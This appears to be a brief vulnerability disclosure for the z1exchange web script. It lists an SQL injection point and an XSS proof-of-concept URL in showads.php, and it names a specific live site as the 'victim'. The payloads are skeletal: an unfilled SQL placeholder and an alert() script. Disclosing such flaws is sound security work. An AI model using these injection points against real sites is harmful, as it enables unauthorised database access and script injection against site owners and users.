z1exchange suffers from cross site scripting and remote SQL injection vulnerabilities.
5b390745afcfa0684522b79dcc8767c7*
*#########################################################
---------------------------------------------------------
Portal Name: z1exchange
Download : http://1scripts.net/scripts/z1exchange.zip
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (SQL,XSS)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/[Path]/showads.php?id=[SQL]
[XSS]:
http://site.com/[Path]/showads.php?id=<script>alert(1369)</script>
---------------------------------
Victem :
http://z1space.com/z1exchange <http://z1space.com/z1exchange>
Comments
No comments yet, be the first!